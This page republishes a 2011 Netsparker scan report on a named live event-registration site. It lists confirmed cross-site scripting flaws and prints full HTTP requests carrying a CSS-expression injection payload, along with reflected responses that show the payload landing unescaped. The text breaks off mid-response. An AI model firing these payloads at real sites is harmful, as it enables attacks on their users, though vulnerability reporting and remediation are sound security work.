XSS, Cross Site Scripting in eiseverywhere.com, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

Netsparker - Scan Report Summary
TARGET URL
https://www.eiseverywhere.com/ereg/index.php?...
SCAN DATE
7/25/2011 10:43:50 AM
REPORT DATE
7/25/2011 11:43:34 AM
SCAN DURATION
00:20:50

Total Requests

Average Speed

req/sec.
54
identified
46
confirmed
0
critical
1
informational

SCAN SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
96 %
LOW
2 %
INFORMATION
2 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/ereg/ Cookie Not Marked As Secure Yes
Cookie Not Marked As HttpOnly Yes
/ereg/newreg.php admin POST Cross-site Scripting Yes
bridgeid POST Cross-site Scripting Yes
admin POST Cross-site Scripting Yes
discountcode POST Cross-site Scripting Yes
eb POST Cross-site Scripting Yes
bridgeid POST Cross-site Scripting Yes
language POST Cross-site Scripting Yes
reference POST Cross-site Scripting Yes
eb POST Cross-site Scripting Yes
admin POST Cross-site Scripting Yes
bridgeid POST Cross-site Scripting Yes
discountcode POST Cross-site Scripting Yes
catpassword[65419] POST Cross-site Scripting Yes
catpassword[65420] POST Cross-site Scripting Yes
catpassword[65413] POST Cross-site Scripting Yes
catpassword[65411] POST Cross-site Scripting Yes
catpassword[65421] POST Cross-site Scripting Yes
catpassword[65407] POST Cross-site Scripting Yes
discountcode POST Cross-site Scripting Yes
eb POST Cross-site Scripting Yes
reference POST Cross-site Scripting Yes
reference POST Cross-site Scripting Yes
language POST Cross-site Scripting Yes
reference POST Cross-site Scripting Yes
eb POST Cross-site Scripting Yes
admin POST Cross-site Scripting Yes
bridgeid POST Cross-site Scripting Yes
discountcode POST Cross-site Scripting Yes
catpassword[65419] POST Cross-site Scripting Yes
catpassword[65420] POST Cross-site Scripting Yes
catpassword[65413] POST Cross-site Scripting Yes
catpassword[65411] POST Cross-site Scripting Yes
catpassword[65421] POST Cross-site Scripting Yes
catpassword[65407] POST Cross-site Scripting Yes
reference POST Cross-site Scripting Yes
eb POST Cross-site Scripting Yes
admin POST Cross-site Scripting Yes
bridgeid POST Cross-site Scripting Yes
reference POST Cross-site Scripting Yes
discountcode POST Cross-site Scripting Yes
eb POST Cross-site Scripting Yes
admin POST Cross-site Scripting Yes
bridgeid POST Cross-site Scripting Yes
discountcode POST Cross-site Scripting Yes
language POST Cross-site Scripting No
language POST Cross-site Scripting No
selectcategoryid POST Cross-site Scripting No
language POST Cross-site Scripting No
language POST Cross-site Scripting No
selectcategoryid POST Cross-site Scripting No
selectcategoryid POST Cross-site Scripting No
/ereg/popups/catdetails.php E-mail Address Disclosure No
Cross-site Scripting

Cross-site Scripting

51 TOTAL
IMPORTANT
CONFIRMED
44
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
admin POST " stYle="x:expre/**/ssion(alert(9))
bridgeid POST 3
categoryid POST -1
catpassword[65407] POST 3
catpassword[65411] POST 3
catpassword[65413] POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65421] POST 3
discountcode POST 3
eb POST 3
eventid POST 19301
language POST eng
reference POST 3
selectcategoryid POST 65410

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=8cf3132cfc114fcb8489fd9c83025ca7
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=6116qt25gojh56fpvl0pcd6bk2
Content-Length: 1607
Accept-Encoding: gzip, deflate

--8cf3132cfc114fcb8489fd9c83025ca7
Content-Disposition: form-data; name="action"

preload_category
--8cf3132cfc114fcb8489fd9c83025ca7
Content-Disposition: form-data; name="admin"

" stYle="x:expre/**/ssion(netsparker(9))
--8cf3132cfc114fcb8489fd9c83025ca7
Content-Disposition: form-data; name="bridgeid"

3
--8cf3132cfc114fcb8489fd9c83025ca7
Content-Disposition: form-data; name="categoryid"

-1
--8cf3132cfc114fcb8489fd9c83025ca7
Content-Disposition: form-data; name="catpassword[65407]"

3
--8cf3132cfc114fcb8489fd9c83025ca7
Content-Disposition: form-data; name="catpassword[65411]"

3
--8cf3132cfc114fcb8489fd9c83025ca7
Content-Disposition: form-data; name="catpassword[65413]"

3
--8cf3132cfc114fcb8489fd9c83025ca7
Content-Disposition: form-data; name="catpassword[65419]"

3
--8cf3132cfc114fcb8489fd9c83025ca7
Content-Disposition: form-data; name="catpassword[65420]"

3
--8cf3132cfc114fcb8489fd9c83025ca7
Content-Disposition: form-data; name="catpassword[65421]"

3
--8cf3132cfc114fcb8489fd9c83025ca7
Content-Disposition: form-data; name="discountcode"

3
--8cf3132cfc114fcb8489fd9c83025ca7
Content-Disposition: form-data; name="eb"

3
--8cf3132cfc114fcb8489fd9c83025ca7
Content-Disposition: form-data; name="eventid"

19301
--8cf3132cfc114fcb8489fd9c83025ca7
Content-Disposition: form-data; name="language"

eng
--8cf3132cfc114fcb8489fd9c83025ca7
Content-Disposition: form-data; name="reference"

3
--8cf3132cfc114fcb8489fd9c83025ca7
Content-Disposition: form-data; name="selectcategoryid"

65410
--8cf3132cfc114fcb8489fd9c83025ca7--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:46:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3035
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" ><a class="menu" href="/ereg/index.php?&" title="Welcome">Welcome</a></td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="bridgeid" value="3" /><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" >ID Code</td><td><input type="text" name="discountcode" value="3" size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td>Training Pass <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
admin POST -1
bridgeid POST " stYle="x:expre/**/ssion(alert(9))
categoryid POST -1
catpassword[65407] POST 3
catpassword[65411] POST 3
catpassword[65413] POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65421] POST 3
discountcode POST 3
eb POST 3
eventid POST 19301
language POST eng
reference POST 3
selectcategoryid POST 65410

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=b144e0415fbd4ee8bf002a9d1e4f6782
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=6116qt25gojh56fpvl0pcd6bk2
Content-Length: 1608
Accept-Encoding: gzip, deflate

--b144e0415fbd4ee8bf002a9d1e4f6782
Content-Disposition: form-data; name="action"

preload_category
--b144e0415fbd4ee8bf002a9d1e4f6782
Content-Disposition: form-data; name="admin"

-1
--b144e0415fbd4ee8bf002a9d1e4f6782
Content-Disposition: form-data; name="bridgeid"

" stYle="x:expre/**/ssion(netsparker(9))
--b144e0415fbd4ee8bf002a9d1e4f6782
Content-Disposition: form-data; name="categoryid"

-1
--b144e0415fbd4ee8bf002a9d1e4f6782
Content-Disposition: form-data; name="catpassword[65407]"

3
--b144e0415fbd4ee8bf002a9d1e4f6782
Content-Disposition: form-data; name="catpassword[65411]"

3
--b144e0415fbd4ee8bf002a9d1e4f6782
Content-Disposition: form-data; name="catpassword[65413]"

3
--b144e0415fbd4ee8bf002a9d1e4f6782
Content-Disposition: form-data; name="catpassword[65419]"

3
--b144e0415fbd4ee8bf002a9d1e4f6782
Content-Disposition: form-data; name="catpassword[65420]"

3
--b144e0415fbd4ee8bf002a9d1e4f6782
Content-Disposition: form-data; name="catpassword[65421]"

3
--b144e0415fbd4ee8bf002a9d1e4f6782
Content-Disposition: form-data; name="discountcode"

3
--b144e0415fbd4ee8bf002a9d1e4f6782
Content-Disposition: form-data; name="eb"

3
--b144e0415fbd4ee8bf002a9d1e4f6782
Content-Disposition: form-data; name="eventid"

19301
--b144e0415fbd4ee8bf002a9d1e4f6782
Content-Disposition: form-data; name="language"

eng
--b144e0415fbd4ee8bf002a9d1e4f6782
Content-Disposition: form-data; name="reference"

3
--b144e0415fbd4ee8bf002a9d1e4f6782
Content-Disposition: form-data; name="selectcategoryid"

65410
--b144e0415fbd4ee8bf002a9d1e4f6782--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:46:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3037
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" ><a class="menu" href="/ereg/index.php?&" title="Welcome">Welcome</a></td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" >ID Code</td><td><input type="text" name="discountcode" value="3" size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td>Training Pass <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
admin POST " stYle="x:expre/**/ssion(alert(9))
apply_code POST Apply Code
bridgeid POST 3
categoryid POST 65410
discountcode POST 3
eb POST 3
eventid POST 19301
input[email] POST netsparker@example.com
language POST eng
reference POST 3
selectcategoryid POST 65410

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=2038f07ba8e5450d9ffa66d14429444b
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=cgh69rbhrtnt41t2tbinjo9o96
Content-Length: 1216
Accept-Encoding: gzip, deflate

--2038f07ba8e5450d9ffa66d14429444b
Content-Disposition: form-data; name="action"

submit
--2038f07ba8e5450d9ffa66d14429444b
Content-Disposition: form-data; name="admin"

" stYle="x:expre/**/ssion(netsparker(9))
--2038f07ba8e5450d9ffa66d14429444b
Content-Disposition: form-data; name="apply_code"

Apply Code
--2038f07ba8e5450d9ffa66d14429444b
Content-Disposition: form-data; name="bridgeid"

3
--2038f07ba8e5450d9ffa66d14429444b
Content-Disposition: form-data; name="categoryid"

65410
--2038f07ba8e5450d9ffa66d14429444b
Content-Disposition: form-data; name="discountcode"

3
--2038f07ba8e5450d9ffa66d14429444b
Content-Disposition: form-data; name="eb"

3
--2038f07ba8e5450d9ffa66d14429444b
Content-Disposition: form-data; name="eventid"

19301
--2038f07ba8e5450d9ffa66d14429444b
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--2038f07ba8e5450d9ffa66d14429444b
Content-Disposition: form-data; name="language"

eng
--2038f07ba8e5450d9ffa66d14429444b
Content-Disposition: form-data; name="reference"

3
--2038f07ba8e5450d9ffa66d14429444b
Content-Disposition: form-data; name="selectcategoryid"

65410
--2038f07ba8e5450d9ffa66d14429444b--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:48:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=vk3oda5dld0flfqiv2smf5bae3; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3105
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul 